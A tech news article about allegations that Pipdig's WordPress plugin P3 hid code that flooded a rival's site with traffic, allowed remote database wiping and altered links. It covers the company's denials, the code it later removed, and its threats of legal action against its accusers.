The curious case of a WordPress plugin, a rival site spammed with traffic, a war of words, and legal threats
Devs strip code from toolkit amid dramarama
Updated A British web-dev outfit has denied allegations it deliberately hid code inside its WordPress plugins that, among other things, spammed a rival's website with junk traffic.
Pipdig, which specializes in designing themes and templates for sites running the popular WordPress publishing system, was accused late last week of including code within its plugins that fired duff requests to the dot-com of a competing maker of themes. It was also accused of slipping in code that allowed it to remotely wipe its users' databases, modify URLs in links, change site admin passwords, and disable other third-party plugins.
These plugins are installed server-side by webmasters to enhance their WordPress installations, and they include backend and frontend code executed as visitors land on pages. Pipdig has denied any wrongdoing.
The accusations were made by Jem Turner, a web developer who questioned the purpose of several subroutines within the Pipdig Power Pack (P3), a set of plugins bundled with Pipdig's themes.
"An unnamed client approached me this week complaining that her website, which was running a theme she’d purchased from a WordPress theme provider, was behaving oddly. Amongst other things, it was getting slower for no obvious reason," Turner claimed on Friday. "As speed is an important ranking factor for search engines (not to mention crucial for retaining visitors), I said I’d do some digging. What I discovered absolutely blew me away; I’ve never seen anything like it."
Turner claimed she'd found that, among other things, Pipdig's plugins fired off traffic to a stranger's website: thus, web servers hosting the P3 PHP code would routinely send HTTP GET requests to a rival's site – kotrynabassdesign.com – thus flooding it with connections from all over the world, it was claimed.
The P3 tools also, it was alleged, manipulated links in customers' pages to direct visitors away from certain websites, collected data from customer sites, could change admin passwords, disabled other plugins, and implemented a remotely activated kill-switch mechanism allowing Pipdig to drop all database tables on a customer's site. Again, this is according to an analysis of the P3 source code.
At the same time, Wordfence, a security vendor specializing in services for WordPress sites, says it fielded a similar complaint about the P3 code from one of its users, and also found the same subroutines Turner described.
"The user, who wishes to remain anonymous, reached out to us with concerns that the plugin's developer can grant themselves administrative access to sites using the plugin, or even delete affected sites' database content remotely," Wordfence explained. "We have since confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities."
Don't look at me, I didn't do it
The reports prompted a strong denial from Pipdig, which argued the claims were unfounded. In its response on Sunday, the Pipdig team denied its software deliberately lobbed web traffic at other sites. What was happening, according to Pipdig, was that the P3 code would, once an hour, fetch the contents of...
...which, strangely, contained...
...causing the P3 code to then fetch that page, which is on another server. That's how the dot-com came to be flooded with requests from systems around the world running Pipdig's code. The biz said it is trying to figure out how the external site's URL ended up in its license text file, which has since been cleared of any text to prevent any unnecessary fetching.
"We're now looking into why this function is returning this URL," Pipdig said in its response. "However it seems to suggest that some of the 'Author URLs' have been set to 'kotrynabassdesign.com'. We don't currently know why this is the case, or whether the site owner has intentionally changed this.
"The response should hit our site's
wp-admin/admin-ajax.php file under normal circumstances. On the surface it could mean that some pipdig themes have been renamed to other authors. We will be looking further into this issue and provide more information as it comes up. We can confirm that it won't cause any issues for sites using pipdig themes, even if the author name/URL has been changed."
Meanwhile, the ability to drop database tables on customer sites is to reset installations to their default state, Pipdig claimed.
"The function is in place to reset a site back to defaults, however it is only activated after being in touch with the site owner," the small business explained.
As for changing URLs, Pipdig chalked that up to anti-piracy measures to ensure links to sites hosting counterfeit copies of its themes are changed over to its domain. Additionally, Pipdig said third-party plugins were disabled during the installation process to prevent any conflicts over functionality, and that it does not change admin passwords, and that the only information it collects from users' installations is the site URL, license key, WordPress version, and plugin or theme version.
According to Wordfence, Pipdig has removed some of the aforementioned code from its software in a newly released version, 4.8.0, which people are urged to update to. "We reached out to the Pipdig team with questions about these issues, and within hours a new version of P3 was released with much of the suspicious code removed," Wordfence reported.
In an email to The Register on Monday, Pipdig creative director Phil Clothier acknowledged the changes, but maintained his company has done nothing wrong. "Wordfence have agreed that latest version of the plugin is safe, however we also stand by that older versions were safe too," Clothier said. "We always recommend that people keep all plugins updated to the latest version either way."
Turner, meanwhile, stood behind her findings and conclusions on the matter. "I am aware that Pipdig have released a statement claiming that I am lying," Turner wrote in an update post. "Firstly, this statement only serves to attempt to attack my character rather than dispute any of my accusations. Secondly, it addresses only my post, and none of the accusations made by Wordfence or other developers."
Pipdig said it was seeking legal advice on the matter, though Turner told The Register she has not yet heard anything from the company.
"We will be seeking legal advice for the untrue statements and misinformation which has no doubt damaged our good name," the Pipdig team added. "Anyone which has worked with us knows how much we care about this community and every single blogger we work with. We're hugely upset, but we can hopefully re-earn any trust that has been lost due to this." ®
Updated to add
Wordfence has, to use a technical term, given Pipdig both barrels on Tuesday, examining the plugin code in depth.
Sponsored: Becoming a Pragmatic Security Leader